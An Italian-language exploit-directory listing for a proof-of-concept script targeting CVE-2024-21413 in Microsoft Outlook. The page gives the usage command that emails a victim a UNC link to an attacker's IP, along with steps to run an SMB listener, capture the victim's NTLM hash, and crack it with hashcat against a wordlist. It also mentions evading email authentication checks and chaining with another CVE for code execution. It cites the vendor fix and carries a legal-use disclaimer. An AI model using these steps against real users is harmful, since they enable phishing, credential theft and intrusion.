Skip to content
KitploitKITPLOIT
StrumentiExploitsBlog
Log in
Invia
StrumentiExploitsBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2024-21413 — Vulnerabilità di divulgazione di informazioni di Microsoft Outlook (fuga di hash della password) - Expect Script POC | Kitploit
Strumenti/GitHubGitHub/duy-31/cve-2024-21413
Password CrackingStrumenti di PhishingAnalisi delle VulnerabilitàExploitApprendimento e FormazioneSicurezza Email
GitHubduy-31/cve-2024-21413

CVE-2024-21413

Vulnerabilità di divulgazione di informazioni di Microsoft Outlook (fuga di hash della password) - Expect Script POC

Vedi Repository
15733132 anni faRevisionato da Kitploit

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2024-21413 - PoC Script Expect

Vulnerabilità di perdita di credenziali ed esecuzione di codice remoto di Microsoft Outlook quando combinata con CVE-2023-21716 (tramite il pannello di anteprima) CVSS:3.1 9.8 / 8.5

Outlook dovrebbe avvisare del rischio nell'aprire un link esterno => ma non è così!

image

uso: ./cve-2024-21413.sh mx.fqdn porta mittente destinatario url

./cve-2024-21413.sh mail.mydomain.com 25 [email protected] [email protected] "\\xx.xx.xx.xx\test\duy31.txt"

note: chmod +x cve-2024-21413.sh

richiede app expect e richiede un mittente IP legittimo e un mittente email (per superare SPF, DKIM, DMARC)


  • Prima esegui un listener SMB come quello

image

  • esegui il PoC

image

  • e attendi l'email e nella finestra di anteprima clicca sul link

image

  • quindi dovresti recuperare il login e l'hash della persona che ha cliccato sul link (senza il prompt di avviso nelle versioni di Outlook affette)

    image

  • Puoi quindi provare a crackare la password con hashcat. Basta copiare tutta la riga con il nome utente in un file ed eseguire hashcat con il modulo 5600

hashcat -a 0 -m 5600 hash.txt rockyou.txt -o cracked.txt -O

  • Puoi combinare questa CVE con CVE-2023-21716 per ottenere RCE !!!

Crediti: [https://research.checkpoint.com/2024/the-risks-of-the-monikerlink-bug-in-microsoft-outlook-and-the-big-picture/]

Workaround/Correzione: [https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-21413]


più su di me ;) https://www.linkedin.com/in/duy-huan-bui/

⚠️ Disclaimer: IMPORTANTE: Questo script è fornito SOLO per scopi educativi, test etici e uso legale. Non utilizzarlo su alcun sistema o rete senza autorizzazione esplicita. L'accesso non autorizzato a sistemi informatici e reti è illegale e gli utenti sorpresi a compiere attività non autorizzate sono soggetti ad azioni legali. L'autore NON è responsabile per eventuali danni causati dall'uso improprio di questo script.

Scarica lo strumento